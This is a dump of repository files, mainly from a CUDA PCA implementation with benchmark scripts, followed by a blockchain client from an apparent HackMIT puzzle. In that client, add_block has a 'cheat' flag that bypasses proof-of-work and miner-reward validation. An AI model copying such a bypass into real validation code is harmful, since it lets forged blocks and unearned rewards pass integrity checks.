"content_id": "38b2f72297cb12d1f1e605d7aca5fcaa302cc733",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 523,
"license_type": "no_license",
"max_line_length": 71,
"num_lines": 27,
"path": "/scripts/run.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\nexport PATH=\"/usr/local/cuda-11.2/bin:$PATH\" &&\nexport LD_LIBRARY_PATH=\"/usr/local/cuda-11.2/lib64:$LD_LIBRARY_PATH\" &&\n\ncd ../src && \nmake clean && make -j 32 &&\ncd ../objs &&\n\n# echo \"IRIS PCA\"\n# ./cudaPca iris.csv 4\n\nDATA=iris.csv\nNCOMP=4\n# DATA=mnist_784.csv\n# NCOMP=784\nTOL=1.e-3\nMAXSWEEPS=15\nECON=1\nVERBOSITY=0\n#jacobi or approx solver\nSOLVER=jacobi\n# SOLVER=jacobi\necho \"mnist 784\" &&\n./cudaPca $DATA $NCOMP $TOL $MAXSWEEPS $ECON $VERBOSITY $SOLVER\n\n# echo \"EIGENFACES PCA\"\n# ./cudaPca face_data.csv 400\n"
},
{
"alpha_fraction": 0.6254056692123413,
"alphanum_fraction": 0.6305053234100342,
"avg_line_length": 28.561643600463867,
"blob_id": "a629d4ba651640619cdc9a55e2d581fb6a3535c9",
"content_id": "dd45660892b9560bcfa3ef54d458a9175cc001d7",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 2157,
"license_type": "no_license",
"max_line_length": 133,
"num_lines": 73,
"path": "/src/main.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#include \"csv.cpp\"\n#include \"include/pca.cuh\"\n#include <chrono>\n#include <assert.h>\n#ifndef min\n#define min(a, b) ((a < b) ? a : b)\n#endif\n#ifndef max\n#define max(a, b) ((a > b) ? a : b)\n#endif\n\n\ntypedef struct SVD {\n float *U;\n float *S;\n float *V;\n} svd_t;\n\nsvd_t perform_svd(float *A, int m, int n);\n\nint main(int argc, const char *argv[]) {\n // load data file\n std::string filename = argv[1];\n csvInfo csv = read_csv(\"../data/\" + filename);\n\n // number of principal components to find\n int ncomponents = std::stoi(argv[2]);\n\n // error tolerance for eigenvectors\n const float tolerance = std::atof(argv[3]);\n\n // max iterations for jacobi\n const int max_sweeps = std::stoi(argv[4]);\n\n // drop irrelevant submatrices from SVD\n const int economy = std::stoi(argv[5]);\n\n\n // print debug output\n bool verbose = false;\n if (std::stoi(argv[6]) > 0){\n verbose = true;\n }\n\n // svd solver: jacobi or approx\n std::string solver = argv[7];\n\n assert(ncomponents > 0);\n\n printf(\"Calling PCA with n_components %d \", ncomponents);\n printf(\"samples %d features %d \\n\", csv.rows, csv.cols);\n std::cout << \"tolerance \" << tolerance << \"\\n\";\n std::cout << \"max_sweeps \" << max_sweeps << \"\\n\";\n std::cout << \"economy \" << economy << \"\\n\";\n\n TimeLogger *tl = new TimeLogger(csv.rows, csv.cols, ncomponents, \"../logs/\" + filename);\n TimeLogger::timeLog *total_time = tl->start(\"Total Time\");\n float_matrix_t ret = perform_pca(csv.matrix, csv.rows, csv.cols, ncomponents, economy, tolerance, max_sweeps, verbose, tl, solver);\n tl->stop(total_time);\n printf(\"PCA on file %s TOTAL Time measured: %f ms.\\n\", filename.c_str(), total_time->time_ms);\n write_logs(tl);\n\n printf(\"Writing output matrices\\n\");\n // write results to disk\n write_matrix_csv(\"../output/\" + solver + \"_\" + filename, ret.matrix, ret.rows, ret.cols);\n printf(\"min(csv.cols, csv.rows) %d\", min(csv.cols, csv.rows));\n write_matrix_csv(\"../output/\" + solver + \"_S_\" + filename, ret.S, min(csv.cols, csv.rows), 1);\n write_matrix_csv(\"../output/\" + solver + \"_V_\" + filename, ret.V, csv.cols, csv.cols);\n free(ret.S);\n free(ret.V);\n free(ret.matrix);\n return 0;\n}"
},
{
"alpha_fraction": 0.6355140209197998,
"alphanum_fraction": 0.6559048295021057,
"avg_line_length": 30,
"blob_id": "95ccd9e71274011c20afaaafc4660f1dea77b9aa",
"content_id": "7943a45d4fb2d74bbc231f5681f15de972b1b762",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1177,
"license_type": "no_license",
"max_line_length": 148,
"num_lines": 38,
"path": "/bench/cuml/pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "from datetime import datetime as dt\nfrom cuml.decomposition import PCA\nimport numpy as np\nfrom time import perf_counter\nimport pandas as pd\n\n# set dataset name\ndataset_name = \"mnist_784.csv\"\ndata_dir = \"../../files/\"\nfile_name = data_dir + dataset_name\n\n# read data\nX = pd.read_csv(file_name)\nX = X.apply(pd.to_numeric, errors='coerce')\nif 'class' in X:\n X = X.drop('class', axis=1)\nif 'target' in X:\n X = X.drop('target', axis=1)\nif 'variety' in X:\n X = X.drop('variety', axis=1)\n\nX = X.values\nX = X.astype(\"float32\")\nsklearn_X = X\nn_components = min(X.shape)\ntime_init_pca = dt.now()\nprint(\"CUML Running PCA with {} features, {} samples, and {} n_components on dataset {}\".format(X.shape[1], X.shape[0], n_components, dataset_name))\npca = PCA(n_components=min(X.shape)\n , copy=True\n , whiten=False\n , svd_solver='jacobi'\n , tol=1.e-3\n , iterated_power=15\n , random_state=42)\ntime_fit_transform = dt.now()\nX_transformed = pca.fit_transform(X)\nprint(\"CUML Time for transform {}ms\".format((dt.now() - time_fit_transform).microseconds / 1000))\nprint(\"CUML Total time {}ms\".format((dt.now() - time_init_pca).microseconds / 1000))"
},
{
"alpha_fraction": 0.5907379388809204,
"alphanum_fraction": 0.6076807379722595,
"avg_line_length": 41.82258224487305,
"blob_id": "03dfcb0a9e3b9dd59d7c8bb6b09e57e5f74c1dff",
"content_id": "15cc0feee4e093c441052aa2fc9f5ee0a64fa2a0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2656,
"license_type": "no_license",
"max_line_length": 111,
"num_lines": 62,
"path": "/bench/kernelpca/kernelpca_tocsv.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import sklearn\nimport numpy as np\nfrom sklearn.decomposition import KernelPCA\nfrom scipy import linalg\nfrom scipy.sparse.linalg import eigsh\nfrom sklearn.utils.extmath import svd_flip\nfrom sklearn.utils.validation import check_is_fitted, _check_psd_eigenvalues\nfrom sklearn.base import BaseEstimator, TransformerMixin\nfrom sklearn.preprocessing import KernelCenterer\nfrom sklearn.metrics.pairwise import pairwise_kernels\nfrom sklearn import datasets\nfrom datetime import datetime as dt\n\n# test = \"manual\"\ntest = \"iris\"\n\nX = np.array([[1.0, 2.0, 5.0], [4.0, 2.0, 1.0]]).T\nout_folder = \"../../output/SKKPCA_\" + test + \"_\"\nif test == \"iris\":\n print(\"Loading iris dataset\")\n iris = datasets.load_iris()\n X = iris.data\n y = iris.target\nprint(\"Shape\", X.shape)\n# KernelType kernel; //!< Type of the kernel function\n# int degree; //!< Degree of polynomial kernel (ignored by others)\n# double gamma; //!< multiplier in the\n# double coef0; \n# prms.kernel = MLCommon::Matrix::KernelParams{Matrix::LINEAR, 0, 0, 0};\n # prms.kernel = MLCommon::Matrix::KernelParams{Matrix::RBF, 0, 1.0/2.0f, 0};\n# prms.kernel = MLCommon::Matrix::KernelParams{Matrix::POLYNOMIAL, 3, 1.0/2.0f, 1};\nkernel_params = [(0,None,0), (0, None, 0), (3, None, 1)]\nmatrices = [\"alphas\", \"lambdas\", \"trans_data\"]\nkernels = [(\"linear\", \"LINEAR\"), (\"rbf\", \"RBF\"), (\"poly\", \"POLYNOMIAL\")]\nfor i in reversed(range(len(kernels))):\n input_kernel, out_kernel = kernels[i]\n degree, gamma, coef0 = kernel_params[i]\n kpca = KernelPCA(n_components=None\n , kernel=input_kernel\n , gamma=gamma\n , degree=degree\n , coef0=coef0\n , kernel_params=None\n , alpha=1.0\n , fit_inverse_transform=False\n , eigen_solver='auto'\n , tol=0\n , max_iter=None\n , remove_zero_eig=False\n , random_state=None\n , copy_X=True\n , n_jobs=-1)\n \n trans_out = kpca.fit_transform(X)\n alphas = kpca.alphas_\n lambdas = kpca.lambdas_\n print(input_kernel, \"trans_out\", trans_out.shape, \"alphas\", alphas.shape, \"lambdas\", lambdas.shape)\n np.savetxt(out_folder + out_kernel + \"_trans_data.csv\", trans_out, delimiter=\",\")\n np.savetxt(out_folder + out_kernel + \"_alphas.csv\", alphas, delimiter=\",\")\n np.savetxt(out_folder + out_kernel + \"_lambdas.csv\", lambdas, delimiter=\",\")\n\n# print(\"SKLEARN KPCA Time for fit_transform {}ms\".format((dt.now() - time_fit_transform).microseconds / 1000))\n\n"
},
{
"alpha_fraction": 0.6423357725143433,
"alphanum_fraction": 0.6671532988548279,
"avg_line_length": 26.440000534057617,
"blob_id": "9decc40addcf53ab2b5ea6a625f75e8c60c28b73",
"content_id": "1a5d22556eed8c1856021d414307a5fe80be769d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 685,
"license_type": "no_license",
"max_line_length": 87,
"num_lines": 25,
"path": "/bench/sklearn/faces_to_csv.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import numpy as np\nimport sys\nimport os\nimport imageio\n\nimages_dir = '/home/gh/kernelpca/files/785_faces/train_data/'\nimage_files = []\n\nfor root, dirs, files in os.walk(images_dir, topdown=False):\n for name in files:\n if name.endswith(\".jpg\"):\n file_name = os.path.join(root, name)\n image_files.append(file_name)\n\nimages = []\n\nfor ctr, fname in enumerate(image_files):\n if ctr % 25000 == 0:\n print(ctr)\n images.append((imageio.imread(fname, as_gray=True))/255)\n\nimages = np.array(images)\nnimages = images.shape[0]\nimages = images.reshape((nimages, -1))\nnp.savetxt(\"/home/gh/kernelpca/files/785_faces/train_faces.csv\", images, delimiter=\",\")"
},
{
"alpha_fraction": 0.5546448230743408,
"alphanum_fraction": 0.5655737519264221,
"avg_line_length": 25.214284896850586,
"blob_id": "2629c47660c6ca65cae1c128f2cdbdceb82e8136",
"content_id": "5d77faef418142fa8876acdda699fab45dc80269",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 366,
"license_type": "no_license",
"max_line_length": 47,
"num_lines": 14,
"path": "/bench/cumlkpca/run.sh",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "export LD_LIBRARY_PATH=\"${CONDA_PREFIX}/lib\" &&\nnvcc \\\n main.cpp \\\n -o kpcBench \\\n \"-L${CONDA_PREFIX}/lib\" \\\n \"-L/home/tomas/618/raft\" \\\n \"-I${CONDA_PREFIX}/include\" \\\n \"-I${CONDA_PREFIX}/include/cuml/raft\" \\\n -lcuml++ &&\nDATA=iris.csv &&\nNCOMP=4 &&\n# LINEAR RBF POLYNOMIAL \nKERNEL=LINEAR && \n./kpcBench $DATA $NCOMP $KERNEL"
},
{
"alpha_fraction": 0.5588235259056091,
"alphanum_fraction": 0.5757918357849121,
"avg_line_length": 19.090909957885742,
"blob_id": "4d8401a7098a825f7c5e3803f34039f357fb11c4",
"content_id": "d4ddc9aef50d59d7abdbcd56637fec84e8c25a2f",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Makefile",
"length_bytes": 884,
"license_type": "no_license",
"max_line_length": 118,
"num_lines": 44,
"path": "/src/Makefile",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "OBJDIR=../objs\n\nEXECUTABLE := ${OBJDIR}/cudaPca\nCU_FILES := pca.cu svd.cu stats.cu svdapprox.cu\nCU_DEPS :=\nCC_FILES := main.cpp\n\n\nall: $(EXECUTABLE)\n\n###########################################################\n\nCXX=g++ -m64\nCXXFLAGS=-O3 -Wall\nLDFLAGS=-L/usr/local/cuda-11.2/lib64/ -lcudart -lcublas -lcusolver\nNVCC=nvcc\nNVCCFLAGS= -O3 -m64 -arch compute_86 -code sm_86 -ccbin /usr/bin/gcc\nOBJS= $(OBJDIR)/main.o $(OBJDIR)/timelogger.o $(OBJDIR)/pca.o $(OBJDIR)/svd.o $(OBJDIR)/svdapprox.o $(OBJDIR)/stats.o \n\n.PHONY: dirs clean\n\nall: $(EXECUTABLE)\n\nformat: \n\tclang-format -i *.cpp *.cu\n\ndefault: $(EXECUTABLE)\n\ndirs:\n\t\tmkdir -p $(OBJDIR)/\n\nclean:\n\t\trm -rf $(OBJDIR) *.ppm *~ $(EXECUTABLE)\n\n$(EXECUTABLE): dirs $(OBJS)\n\t\t$(CXX) $(CXXFLAGS) -o $@ $(OBJS) $(LDFLAGS)\n\n\n\n$(OBJDIR)/%.o: %.cpp\n\t\t$(CXX) $< $(CXXFLAGS) -c -o $@\n\n$(OBJDIR)/%.o: %.cu\n\t\t$(NVCC) $< $(NVCCFLAGS) -c -o $@\n"
},
{
"alpha_fraction": 0.6937354803085327,
"alphanum_fraction": 0.7084299921989441,
"avg_line_length": 40.74193572998047,
"blob_id": "c67c231c2616e0ca2b86e1b0c18b892bff0d80ae",
"content_id": "a192da75a2ebb98ae2662d89c2aa033c95fcd876",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1293,
"license_type": "no_license",
"max_line_length": 194,
"num_lines": 31,
"path": "/bench/skcuda/pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "import pycuda.autoinit\nimport pycuda.gpuarray as gpuarray\nimport numpy as np\nimport pandas as pd\nimport skcuda.linalg as linalg\nfrom datetime import datetime as dt\nfrom skcuda.linalg import PCA as cuPCA\n\ndataset_name = \"mnist_784.csv\"\ndata_dir = \"../../files/\"\nfile_name = data_dir + dataset_name\nX = pd.read_csv(file_name)\nif 'class' in X:\n X = X.drop('class', axis=1)\nif 'target' in X:\n X = X.drop('target', axis=1)\nif 'variety' in X:\n X = X.drop('variety', axis=1)\nX = np.array(X.values, dtype=\"float64\")\nsamples, features = X.shape\nn_components = features\nprint(\"SKCUDA Running PCA with {} features, {} samples, and {} n_components on dataset {}\".format(X.shape[1], X.shape[0], n_components, dataset_name))\ntime_init_pca = dt.now()\npca = cuPCA(n_components=n_components) # map the data to 4 dimensions\nX_gpu = gpuarray.GPUArray((samples,features), np.float64, order=\"F\") # note that order=\"F\" or a transpose is necessary. fit_transform requires row-major matrices, and column-major is the default\nX_gpu.set(X) # copy data to gpu\nT_gpu = pca.fit_transform(X_gpu) # calculate the principal components\nprint(linalg.dot(T_gpu[:,0], T_gpu[:,1]))\nprint(\"get_n_components()\", pca.get_n_components())\n\nprint(\"SKCUDA Total time {}ms\".format((dt.now() - time_init_pca).microseconds / 1000))"
},
{
"alpha_fraction": 0.6792716979980469,
"alphanum_fraction": 0.6820728182792664,
"avg_line_length": 46.46666717529297,
"blob_id": "e46708d5dccc57b04faaa8cb06d26623e223195c",
"content_id": "a46c9396dba03b9b1c80310d4682dac444d4e92c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 714,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 15,
"path": "/src/timelogger.cpp",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#include \"include/timelogger.h\"\nTimeLogger::TimeLogger(int features, int samples, int n_components, std::string log_name) : \n features{features}, samples{samples}, n_components{n_components}, log_name{log_name} {}\nTimeLogger::timeLog* TimeLogger::start(std::string name) {\n timeLog *tl = new timeLog(this->features, this->samples, this->n_components, name, std::chrono::high_resolution_clock::now());\n logs.push_back(tl);\n return tl;\n}\nvoid TimeLogger::stop(timeLog* tl) {\n auto end = std::chrono::high_resolution_clock::now();\n tl->end_time = end;\n auto elapsed =\n std::chrono::duration_cast<std::chrono::nanoseconds>(end - tl->start_time);\n tl->time_ms = elapsed.count() * 1e-6;\n}\n\n\n"
},
{
"alpha_fraction": 0.6157684922218323,
"alphanum_fraction": 0.6257485151290894,
"avg_line_length": 30.34375,
"blob_id": "d2bbdea87ef4eef0d790a42d2f078f069a8f3214",
"content_id": "5bfde8a6a2b89cbc43df6c4875fc6b067a14d87c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "C++",
"length_bytes": 1002,
"license_type": "no_license",
"max_line_length": 159,
"num_lines": 32,
"path": "/src/include/timelogger.h",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "#pragma once\n\n#include <chrono>\n#include <string>\n#include <vector>\n\n\n\nclass TimeLogger {\n public:\n struct timeLog {\n int features;\n int samples;\n int n_components;\n double time_ms;\n std::string name;\n std::chrono::high_resolution_clock::time_point start_time;\n std::chrono::high_resolution_clock::time_point end_time;\n timeLog(int features, int samples, int n_components, std::string name, std::chrono::high_resolution_clock::time_point start_time) : features{features},\n samples{samples}, n_components{n_components}, name{name}, start_time{start_time}{\n time_ms = -123456789.0; // To identify logs without stop()\n }\n };\n std::vector<timeLog*> logs;\n int features;\n int samples;\n int n_components;\n std::string log_name;\n TimeLogger(int features, int samples, int n_components, std::string log_name);\n timeLog* start(std::string name);\n void stop(timeLog* tl);\n};"
},
{
"alpha_fraction": 0.67405766248703,
"alphanum_fraction": 0.6796008944511414,
"avg_line_length": 28.032258987426758,
"blob_id": "7de02ec23e596ef50bf4e402556ccea4fb96bc7e",
"content_id": "3719275822d96e1d81ac74c122a291dd52878e62",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 902,
"license_type": "no_license",
"max_line_length": 81,
"num_lines": 31,
"path": "/bench/sklearn/test_our_pca.py",
"repo_name": "tjohanne/PCA",
"src_encoding": "UTF-8",
"text": "from datetime import datetime as dt\nfrom sklearn.decomposition import PCA\nfrom time import perf_counter\nfrom helpers import *\n\n# set dataset name\ndata_file_name = \"face_data.csv\"\ndataset_name = \"Eigenfaces\"\ndata_dir = \"/home/gh/kernelpca/output/\"\nresult_path = \"/home/gh/kernelpca/bench/sklearn/images/\"\nU_file_name = data_dir + data_file_name\nS_file_name = data_dir + \"S_\" + data_file_name\nVT_file_name = data_dir + \"V_\" + data_file_name\n\n# read data\nU = pd.read_csv(U_file_name).values\nS = pd.read_csv(S_file_name).values\nVT = pd.read_csv(VT_file_name).values\n\nplot_components(components=VT\n , ncomponents=400\n , result_path=result_path\n , dataset_name=dataset_name\n , method=\"cuda_jacobi\")\n\n\n\n\n\n# recovered_images=[reconstruction(Y, C, M, h, w, i) for i in range(len(images))]\n# plot_portraits(recovered_images, celebrity_names, h, w, n_row=4, n_col=4)\n\n\n"
}
] | 20 |
codecherry12/myprograms
|
https://github.com/codecherry12/myprograms
|
c9dba282de17aacac74aeee517effc73a7c6bd27
|
58f92127aec8a0aa54a0ea492a0cb9502eed3215
|
60552aefb7ffea79977f5383ba899a4530ad03ef
|
refs/heads/master
| 2023-05-10T17:09:56.990157 | 2021-05-24T09:04:16 | 2021-05-24T09:04:16 | 370,282,585 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.8139534592628479,
"alphanum_fraction": 0.8139534592628479,
"avg_line_length": 20.5,
"blob_id": "13ae92e14a06d64694b5b216cc2e8c01dbaae56e",
"content_id": "aafb919813fa894a6cd03c801f4211fd829b665c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 43,
"license_type": "no_license",
"max_line_length": 29,
"num_lines": 2,
"path": "/README.md",
"repo_name": "codecherry12/myprograms",
"src_encoding": "UTF-8",
"text": "# myprograms\nthese are related to programs\n"
},
{
"alpha_fraction": 0.6326087117195129,
"alphanum_fraction": 0.72826087474823,
"avg_line_length": 31.928571701049805,
"blob_id": "2277219845e06ee7ddd7eb048921a85baf303b30",
"content_id": "1355abaf43585e73e27b5d029264cbad103a95b0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 460,
"license_type": "no_license",
"max_line_length": 94,
"num_lines": 14,
"path": "/p1.py",
"repo_name": "codecherry12/myprograms",
"src_encoding": "UTF-8",
"text": "Python 3.9.2 (tags/v3.9.2:1a79785, Feb 19 2021, 13:44:55) [MSC v.1928 64 bit (AMD64)] on win32\nType \"help\", \"copyright\", \"credits\" or \"license()\" for more information.\n>>> import PyPDF2\n\npdffileobj = open('EE_GATEPaper_2020.pdf','rb')\npdfreader = PyPDF2.pdfFilereader(pdffileobj)\n\nx = pdfreader.numPages\npageobj=pdfreader.getPage(x-1)\ntext=pageobj.extractText()\n\nfile1=open(r\"C:\\Users\\jeeii\\OneDrive\\Desktop\\P\\\\S.txt\",\"a\")\nfile1.writelines(text)\nfile1.close()"
},
{
"alpha_fraction": 0.7038626670837402,
"alphanum_fraction": 0.721030056476593,
"avg_line_length": 37.83333206176758,
"blob_id": "4531b7c798dbc9228f86521d152803a226b11227",
"content_id": "a68bbf85c29d6d37f1a864cfa29b0e980b7c72cc",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 233,
"license_type": "no_license",
"max_line_length": 62,
"num_lines": 6,
"path": "/p2.py",
"repo_name": "codecherry12/myprograms",
"src_encoding": "UTF-8",
"text": "baggage_count=50\nno_of_baggage_picked=0\nwhile(baggage_count>0):\n no_of_baggage_picked = (int)(input (\"Number of baggage:\"))\n baggage_count = baggage_count - no_of_baggage_picked\nprint(\"No. of baggage remaining:\",baggage_count)\n"
}
] | 3 |
000alen/HackMIT
|
https://github.com/000alen/HackMIT
|
431798bdb6888ddfe6715ca170a784f65b6bad92
|
f918b91fc4972687dba38ed2a1361b95369f1573
|
97b5a0b80ec7a713c6c0d9dfa5ea33e6cef85c73
|
refs/heads/main
| 2023-07-27T08:50:04.410341 | 2021-08-25T07:08:21 | 2021-08-25T07:08:21 | 397,749,840 | 2 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.5608407258987427,
"alphanum_fraction": 0.5621681213378906,
"avg_line_length": 32.8576774597168,
"blob_id": "6f61fbaf2b1a0c2dc82496db35dfc5669743b22a",
"content_id": "1cdb6bb62a8f6e9bbec511f844c5865e4392c7c9",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 9040,
"license_type": "no_license",
"max_line_length": 158,
"num_lines": 267,
"path": "/puzzle4/modded_client/blockchain.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
"text": "import hashlib\nimport datetime\nimport json\nfrom utils import trim_string\nfrom time import time\nfrom typing import Union, List\nimport constants as constants\nimport crypto as crypto\nimport jsonpickle\n\n\nclass Transaction:\n def __init__(self, id: str, sender: str, receiver: str, value: int, signature: str):\n self.id = id\n self.sender = sender\n self.receiver = receiver\n self.value = value\n self.signature = signature\n\n def __str__(self):\n return json.dumps({\n 'id': self.id,\n 'sender': self.sender,\n 'receiver': self.receiver,\n 'value': self.value,\n 'signature': self.signature\n })\n\n def pretty_print(self, max_str_len=None, agents=None):\n sender = agents[self.sender] if agents and self.sender in agents else self.sender\n receiver = agents[self.receiver] if agents and self.receiver in agents else self.receiver\n\n if(not max_str_len):\n return f\"[id: {self.id}, {sender} -> {receiver}, {self.value} coins]\"\n return f\"[id: {trim_string(self.id, max_str_len//2)}, {trim_string(sender, max_str_len)} -> {trim_string(receiver, max_str_len)}, {self.value} coins]\"\n\n def comp(self):\n return json.dumps({\n 'id': self.id,\n 'sender': self.sender,\n 'receiver': self.receiver,\n 'value': self.value,\n })\n\n # XXX\n def valid_signature(self):\n if self.sender == \"mined\":\n return True\n return crypto.verify(self.comp(), self.sender, self.signature)\n\n def to_json(self):\n return {\n 'id': self.id,\n 'sender': self.sender,\n 'receiver': self.receiver,\n 'value': self.value,\n 'signature': self.signature\n }\n\n @staticmethod\n def from_json(jobj):\n return Transaction(\n id=str(jobj['id']),\n sender=jobj['sender'],\n receiver=jobj['receiver'],\n value=int(jobj['value']),\n signature=jobj['signature']\n )\n\n def sign(self, private):\n self.signature = crypto.sign(self.comp(), private)\n\n\nclass Block:\n def __init__(self, transactions: List[Transaction], previous_hash: str, miner=\"Anonymous\", nonce: int = 0, height: int = -1, timestamp=int(time())):\n self.timestamp = timestamp\n self.transactions = transactions\n self.previous_hash = previous_hash\n self.nonce = nonce\n self.height = height\n self.miner = miner\n\n self.parent: Union[Block, None] = None\n self.parent_hash: str = \"\"\n\n self.transaction_map = {txn.comp() for txn in self.transactions}\n\n def add_transaction(self, transaction: Transaction):\n self.transactions.append(transaction)\n self.transaction_map.add(transaction.comp())\n\n def get_hash_str(self):\n return f\"{self.timestamp}{[str(t) for t in self.transactions]}{self.previous_hash}{self.nonce}\".encode()\n\n def get_hash(self):\n sha = hashlib.sha256(self.get_hash_str())\n return sha.hexdigest()\n\n def set_parent(self, parent):\n self.parent = parent\n self.height = parent.height + 1\n\n def print_transactions(self):\n for tr in self.transactions:\n print(str(tr))\n\n def is_valid(self):\n return int(self.get_hash(), 16) < constants.DIFFICULTY\n\n def __str__(self):\n return json.dumps({\n 'timestamp': str(self.timestamp),\n 'transactions': [str(t) for t in self.transactions],\n 'previous_hash': str(self.previous_hash),\n 'nonce': self.nonce\n })\n\n def to_json(self):\n return {\n 'timestamp': self.timestamp,\n 'transactions': [t.to_json() for t in self.transactions],\n 'previous_hash': self.previous_hash,\n 'nonce': self.nonce\n }\n\n @staticmethod\n def from_json(jobj):\n return Block(\n timestamp=int(jobj['timestamp']),\n transactions=[\n Transaction.from_json(tj)\n for tj in jobj['transactions']\n ],\n previous_hash=str(jobj['previous_hash']),\n nonce=int(jobj['nonce'])\n )\n\n\ndef create_genesis_block():\n return Block([], \"\")\n\n\nclass Blockchain:\n def __init__(self):\n first_block = create_genesis_block()\n\n self.head = first_block\n self.blocks = {first_block.get_hash(): first_block}\n\n def traverse_blocks(self, head: Block, include_head=True):\n if include_head:\n yield head\n current = head.parent\n genisis_hash: str = create_genesis_block().get_hash()\n while current != None and current.get_hash() != genisis_hash:\n yield current\n current = current.parent\n\n def get_balance(self, address: str) -> int:\n total = 0\n\n for block in self.traverse_blocks(self.head, include_head=True):\n if not block:\n break\n\n for txn in block.transactions:\n if txn.sender == address and txn.receiver != address:\n total -= txn.value\n elif txn.sender != address and txn.receiver == address:\n total += txn.value\n return total\n\n def add_block(self, block: Block, cheat=False):\n \"\"\"Checks the entire chain for valid transactions\n and checks proof of work. Then adds block.\"\"\"\n\n block_hash = block.get_hash()\n\n # We already know this block.\n if block_hash in self.blocks:\n return False, \"Known block.\", {}\n\n # Parent doesn't exist :(\n if block.previous_hash not in self.blocks:\n return False, \"No valid parent.\", {}\n parent = self.blocks[block.previous_hash]\n block.set_parent(parent)\n\n # Check proof of work ;o\n if not cheat and not block.is_valid():\n return False, \"Invalid proof of work.\", {}\n\n # Verify transaction signatures.\n for transaction in block.transactions:\n if transaction.sender != \"mined\" and not transaction.valid_signature():\n return False, \"Transaction has invalid signature.\", {\"txn\": transaction}\n\n # Have any of these transactions been replays?\n for b in self.traverse_blocks(block, include_head=False):\n for c_txn in block.transactions:\n if c_txn.comp() in b.transaction_map:\n # We found the same transaction in a previous block.\n return False, \"Transaction replay detected.\", {\"txn\": c_txn}\n\n # For every transaction, does the sender own this money?\n reward_counted = False\n running_balance = {}\n for txn in block.transactions:\n if txn.value < 0:\n return False, \"Amount can't be negative.\", {\"txn\": txn}\n\n if txn.sender not in running_balance:\n running_balance[txn.sender] = 0\n\n if txn.sender == \"mined\":\n # This is the miner reward, let's make sure\n # it's correct. Technically, the miner can make\n # this payment to anyone she likes.\n if not cheat and txn.value > constants.REWARD:\n return False, \"Incorrect miner reward.\", {\"txn\": txn}\n\n # Let's also make sure the reward is only given\n # once and once only.\n if reward_counted:\n return False, \"Miner reward found twice in block.\", {\"txn\": txn}\n\n reward_counted = True\n running_balance[txn.sender] += constants.REWARD\n else:\n sender_coins = self.get_balance(\n txn.sender) + running_balance[txn.sender]\n print(\"sender balance: \", sender_coins)\n print(\"value: \", txn.value)\n if sender_coins < txn.value:\n # sender doesn't have enough coins,\n # block is invalid.\n return False, \"sender doesn't have enough coins.\", {\"txn\": txn}\n running_balance[txn.sender] -= txn.value\n\n # Looks like everything is set with this block.\n # Let's add this block and compute the longest\n # chain.\n\n self.blocks[block_hash] = block\n if block.height > self.head.height:\n self.head = block\n\n return True, \"Block added.\", {}\n\n def to_json(self):\n return jsonpickle.encode(self)\n\n # needs to flatten Block linked list to be serializable\n def _flatten(self):\n for block in self.blocks.values():\n if(block.parent):\n block.parent_hash = block.parent.get_hash()\n block.parent = None\n\n def _unflatten(self):\n for block in self.blocks.values():\n try:\n block.parent_hash\n except:\n block.parent_hash = \"\"\n if(block.parent_hash):\n block.parent = self.blocks[block.parent_hash] # type: ignore\n"
},
{
"alpha_fraction": 0.5374722480773926,
"alphanum_fraction": 0.556624710559845,
"avg_line_length": 29.617563247680664,
"blob_id": "b059812b4d585033129b80a7c418168e3293a9a8",
"content_id": "26e524a0b66dd33e1940f31a2314b7462cc4d788",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 10808,
"license_type": "no_license",
"max_line_length": 150,
"num_lines": 353,
"path": "/puzzle5/main.py",
"repo_name": "000alen/HackMIT",
"src_encoding": "UTF-8",
